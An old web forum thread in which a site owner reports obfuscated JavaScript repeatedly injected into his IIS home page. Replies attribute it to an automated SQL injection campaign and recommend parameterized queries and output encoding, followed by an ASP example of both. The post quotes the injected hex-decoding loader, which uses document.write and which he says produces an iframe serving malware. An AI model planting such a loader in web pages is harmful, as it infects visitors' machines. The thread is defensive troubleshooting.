new type of injection? rewrite default document?


Brian Bozarth

This is weird. I'm pretty familiar with SQL Injection, but we're getting
these weird injections that are writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='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';document.write(q4877d47d93974(q4877d47d9740a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
on my machine because I think I have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it is automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian
 

ThatsIT.net.au

It would seem you have a virus on your machine that is adding the code.

This is just a thought, I don't know if it will work, but try auditing access
to the file. Maybe then you can at least see what user the virus is running
under. Look in your task manager for processes running
 

Bob Barrows [MVP]

Brian said:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home page. What it's doing is putting in script code at the top or bottom
of the home page... it looks something like this:

Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/ar...-of-a-sql-injection-incident-part-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses Google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data retrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/microsoft.public.inetserver.asp.db/msg/72e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as they are known in Access:

Access:
http://www.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&[email protected]

http://groups.google.com/groups?hl=...=1&[email protected]


SQL Server:

http://groups.google.com/group/microsoft.public.inetserver.asp.general/msg/5d3c9d4409dc1701?hl=en&


2. Use Server.HTMLEncode when writing data to Response
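
The two fixes recommended in the reply above, sketched for a Classic ASP page. This is an added example, not code from the thread or from the linked posts; the connection string in Application("ConnStr"), the Articles table with its Id, Title and Body columns, and the "id" querystring parameter are assumptions.

```vbscript
<%
Option Explicit
' Added example. Assumed names: Application("ConnStr"), table Articles(Id, Title, Body),
' querystring parameter "id". ADO constants are declared here so adovbs.inc is not needed.
Const adCmdText = 1
Const adParamInput = 1
Const adInteger = 3

' Pattern to remove (dynamic SQL built from the querystring):
'   sql = "SELECT Title, Body FROM Articles WHERE Id = " & Request.QueryString("id")

Dim rawId, re, conn, cmd, rs
rawId = Request.QueryString("id")

' Validate first: accept only a short run of digits, reject everything else.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")

' Fix 1: parameter marker (?) instead of string concatenation.
' The value travels as typed data and is never parsed as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Title, Body FROM Articles WHERE Id = ?"
cmd.Parameters.Append cmd.CreateParameter("@Id", adInteger, adParamInput, , CLng(rawId))
Set rs = cmd.Execute

If rs.EOF Then
    Response.Status = "404 Not Found"
Else
    ' Fix 2: encode on output. A <script> tag already stored in a column is
    ' rendered as visible text instead of being executed by the browser.
    ' & "" turns a Null column into an empty string before encoding.
    Response.Write "<h1>" & Server.HTMLEncode(rs("Title") & "") & "</h1>"
    Response.Write "<div>" & Server.HTMLEncode(rs("Body") & "") & "</div>"
End If

rs.Close
conn.Close
%>
```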
 
